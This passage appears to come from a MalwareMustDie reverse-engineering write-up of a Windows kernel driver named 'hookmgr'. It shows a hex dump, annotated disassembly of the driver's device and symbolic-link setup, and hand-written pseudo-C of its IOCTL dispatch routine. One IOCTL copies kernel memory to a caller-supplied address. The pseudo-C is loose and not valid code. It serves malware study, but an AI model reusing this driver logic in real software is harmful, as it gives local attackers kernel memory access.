  289. 00001380  dd 02 4b 65 42 75 67 43  68 65 63 6b 45 78 00 00  |..KeBugCheckEx..|
  290. 00001390  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  291. 00001400  00 10 00 00 70 00 00 00  1b 30 29 30 33 30 4b 30  |....p....0)030K0|
  292. 00001410  59 30 63 30 78 30 7d 30  92 30 5c 31 cb 31 d8 31  |Y0c0x0}0.0\1.1.1|
  293. 00001420  de 31 ea 31 14 32 21 32  27 32 33 32 84 32 d3 32  |.1.1.2!2 232.2.2|
  294. 00001430  d8 32 de 32 1b 33 22 33  2b 33 31 33 3a 33 40 33  |.2.2.3 3+313:3@3|
  295. 00001440  45 33 50 33 5c 33 6a 33  6f 33 75 33 88 33 a8 33  |E3P3\3j3o3u3.3.3|
  296. 00001450  af 33 e2 33 c0 34 13 35  2c 35 4d 35 59 35 65 36  |.3.3.4.5,5M5Y5e6|
  297. 00001460  93 36 9c 36 c2 36 cd 36  ed 36 f3 36 01 37 00 00  |.6.6.6.6.6.6.7..|
  298. 00001470  00 20 00 00 10 00 00 00  9c 30 a0 30 2c 31 30 31  |. .......0.0,101|
  299. 00001480  00 40 00 00 14 00 00 00  06 30 18 30 1f 30 24 30  |.@.......0.0.0$0|
  300. 00001490  2d 30 34 30 00 00 00 00  00 00 00 00 00 00 00 00  |-040............|
  301. 000014a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  302.  
  303. // The installation was reversed starting from the driver entry point: 0x0001403e -> 0x00011310
  304. // it creates the "hookmgr" device object for the driver
  305. |       |   0x0001403e      8bff           mov edi, edi
  306. |       |   0x00014040      55             push ebp
  307. |       |   0x00014041      8bec           mov ebp, esp
  308. |       |   0x00014043      e8bdffffff     call 0x14005
  309. |       |   0x00014048      5d             pop ebp
  310. \       `=< 0x00014049      e9c2d2ffff     jmp 0x11310
  311.                   ↓ ↓ ↓ ↓ ↓
  312. |           0x00011310      8bff           mov edi, edi
  313. |           0x00011312      55             push ebp
  314. |           0x00011313      8bec           mov ebp, esp
  315. |           0x00011315      83ec0c         sub esp, 0xc
  316. |           0x00011318      c745f4101801.  mov dword [ebp-local_3], 0x11810 ; [0x11810:4]="\\Device\\hookmgr"
  317. |           0x0001131f      c745f8e01701.  mov dword [ebp-local_2], 0x117e0 ; [0x117e0:4]="\\DosDevices\\hookmgr"
  318. |           0x00011326      8b45f4         mov eax, dword [ebp-local_3] ; source = ebp-local_3
  319. |           0x00011329      50             push eax        ;  source
  320. |           0x0001132a      6828300100     push 0x13028    ;  dest
  321. |           0x0001132f      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  322. |           0x00011335      8b4df8         mov ecx, dword [ebp-local_2] ; src = ebp-local_2
  323. |           0x00011338      51             push ecx       ; src
  324. |           0x00011339      6830300100     push 0x13030   ; dest
  325. |           0x0001133e      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  326. |           0x00011344      6818300100     push 0x13018  ; Object Device (DeviceObject)
  327. |           0x00011349      6a00           push 0        ; excl bit
  328. |           0x0001134b      6a00           push 0        ; characteristic
  329. |           0x0001134d      6a15           push 0x15     ; type
  330. |           0x0001134f      6828300100     push 0x13028  ; name
  331. |           0x00011354      6a00           push 0        ; extension
  332. |           0x00011356      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  333. |           0x00011359      52             push edx      ; object
  334. |           0x0001135a      ff1520200100   call dword [0x12020] ; ntoskrnl.exe_IoCreateDevice
  335. |           0x00011360      8945fc         mov dword [ebp-local_1], eax
  336. |           0x00011363      837dfc00       cmp dword [ebp-local_1], 0
  337. |       ,=< 0x00011367      7c4a           jl 0x113b3
  338.  
  339. ////////////////////////////////
  340. symbolic link creation; the device is deleted if that fails....
  341. ////////////////////////////////
  342. |       |   0x00011369      6828300100     push 0x13028
  343. |       |   0x0001136e      6830300100     push 0x13030
  344. |       |   0x00011373      ff151c200100   call dword [sym.imp.ntoskrnl.exe_IoCreateSymbolicLink] ; ".A" @ 0x1201c
  345. |       |   0x00011379      8945fc         mov dword [ebp-local_1], eax
  346. |       |   0x0001137c      837dfc00       cmp dword [ebp-local_1], 0
  347. |      ,==< 0x00011380      7c24           jl 0x113a6
  348. |      ||   0x00011382      8b4508         mov eax, dword [ebp+arg_2]  ; [0x8:4]=4
  349. |      ||   0x00011385      c74070701001.  mov dword [eax + 0x70], 0x11070 ; [0x11070:4]=0x8b55ff8b
  350. |      ||   0x0001138c      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  351. |      ||   0x0001138f      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  352. |      ||   0x00011392      8b4270         mov eax, dword [edx + 0x70] ; [0x70:4]=0x65646f6d  ; 'p' ; "mode....$" @ 0x70
  353. |      ||   0x00011395      894140         mov dword [ecx + 0x40], eax
  354. |      ||   0x00011398      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  355. |      ||   0x0001139b      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  356. |      ||   0x0001139e      8b4240         mov eax, dword [edx + 0x40] ; [0x40:4]=0xeba1f0e  ; '@'
  357. |      ||   0x000113a1      894138         mov dword [ecx + 0x38], eax
  358. |     ,===< 0x000113a4      eb0d           jmp 0x113b3
  359. |     |`--> 0x000113a6      8b0d18300100   mov ecx, dword [0x13018]    ; [0x13018:4]=0
  360. |     | |   0x000113ac      51             push ecx
  361. |     | |   0x000113ad      ff1518200100   call dword [sym.imp.ntoskrnl.exe_IoDeleteDevice] ; sym.imp.ntoskrnl.exe_IoDeleteDevice
  362. |     | |   ; JMP XREF from 0x000113a4 (fcn.00011310)
  363. |     `-`-> 0x000113b3      8b45fc         mov eax, dword [ebp-local_1]
  364. |           0x000113b6      8be5           mov esp, ebp
  365. |           0x000113b8      5d             pop ebp
  366. \           0x000113b9      c20800         ret 8
  367.  
  368. ///////////////////////////////////
  369. Driver dispatch routine: switch on the request code to pick the action
  370. //////////////////////////////////
  371. fn.0x011070 ;;
  372. int ({eax}, int[var_loc], PIRP Irp)
  373. {
  374.   ULONG_PTR  [sp-0x010] [bp-254]
  375.   ULONG_PTR  [sp+0x22C] [bp-18]
  376.   ULONG_PTR  [sp+0x23C] [bp-8]
  377.  
  378.   char var0x01 = [sp+0x00C] [bp-0x0238]
  379.   char var0x02 = [sp+0x004] [bp-0x0240]
  380.   char var0x04 = [sp+0x22C] [bp-0x018h]
  381.  
  382.   var0x02 = *(_BYTE *)0x012B0(Irp);  
  383.   if ( var0x02 == 14 )
  384.   {
  385.     switch ( {*(_DWORD *)(v9 + 12);} )
  386.     {
  387. /////////////////////////
  388.       case 0x224004:
  389. ////////////////////////
  390.         if ( v8 < 0xC )
  391.         {
  392.           var0x01 = -0xERR;
  393.         }
  394.         else
  395.         {
  396.           {-2} = 0;
  397.           ProbeForWrite(*(PVOID *)&{Irp->AssociatedIrp.MasterIrp;}->Type, {Irp->AssociatedIrp.MasterIrp;}->Flags, 1u);
  398.           memcpy(*(void **)&v11->Type, v11->MdlAddress, v11->Flags);
  399.           var0x01 = 0;
  400.           {-2} = -2;
  401.         }
  402.         break;
  403.  
  404. ////////////////////////
  405.       case 0x22400C:
  406. ////////////////////////
  407.         if ( !DWORD-0x1301C )
  408.           DWORD-0x1301C = (int)sub_11010();
  409.         if ( DWORD-0x1301C )
  410.         {
  411.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x1301C;
  412.           Irp->IoStatus.Information = 4;
  413.           var0x01 = 0;
  414.         }
  415.         else
  416.         {
  417.           var0x01 = -0xERR;
  418.         }
  419.         break;
  420.  
  421. /////////////////////////
  422.       case 0x224014:
  423. ////////////////////////
  424.         if ( !DWORD-0x13020 )
  425.           DWORD-0x13020 = (int)sub_11040();
  426.         if ( DWORD-0x13020 )
  427.         {
  428.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x13020;
  429.           Irp->IoStatus.Information = 4;
  430.           var0x01 = 0;
  431.         }
  432.         else
  433.         {
  434.           var0x01 = -0xERR;
  435.         }
  436.         break;
  437.  
  438. ////////////////////
  439.       default:
  440. ////////////////////
  441.         var0x01 = -0xERR;
  442.         break;
  443.     }
  444.   }
  445. ///////////////
  446.   else
  447. //////////////
  448.   {
  449.     var0x01 = 0;
  450.   }
  451.   var0x01{Irp->IoStatus.Status}
  452.   IofCompleteRequest(Irp, 0);
  453.   return 0;
  454. }
  455.  
  456. An explanation of the switch-case above is in the kernelmode.info thread below, with help from FireFox:
  457. http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4217&p=27791#p27792
  458.  
  459. #  @unixfreaxjp | #MalwareMustDie